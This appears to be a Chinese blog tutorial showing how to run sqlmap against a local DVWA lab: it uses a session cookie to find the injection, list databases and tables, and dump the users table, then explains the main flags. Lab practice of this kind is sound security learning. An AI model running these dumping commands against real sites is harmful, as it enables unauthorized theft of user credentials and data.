sqlmap学习(2)
尝试获取dvwa用户数据
登入dvwa,选择sql injection。在输入框内输入1,观察浏览器地址栏
打开终端,输入指令
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=00vbcot006jabet0jfiut8nl75; security=low" --banner
其中,-u 后为你得到的url,注意双引号。cookie中cookie字段按你浏览器开发面板中得到的填写。
得到返回值如下
这就是sqlmap扫描到的注入漏洞。
接下来,尝试读取数据库中数据
//获取所有数据库
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=00vbcot006jabet0jfiut8nl75; security=low" --dbs
//获取dvwa库中表
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=00vbcot006jabet0jfiut8nl75; security=low" -D dvwa --tables
//获取表信息
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=00vbcot006jabet0jfiut8nl75; security=low" -D dvwa -T users --dump
成功获取所有用户信息
一些参数的含义
--users:获取所有用户
--dbs:获取所有数据库
-D:指定数据库
--tables:获取所有表
-T:指定表
--columns:获取所有字段
-C:指定字段
--dump:获取表中所有数据
posted on
浙公网安备 33010602011771号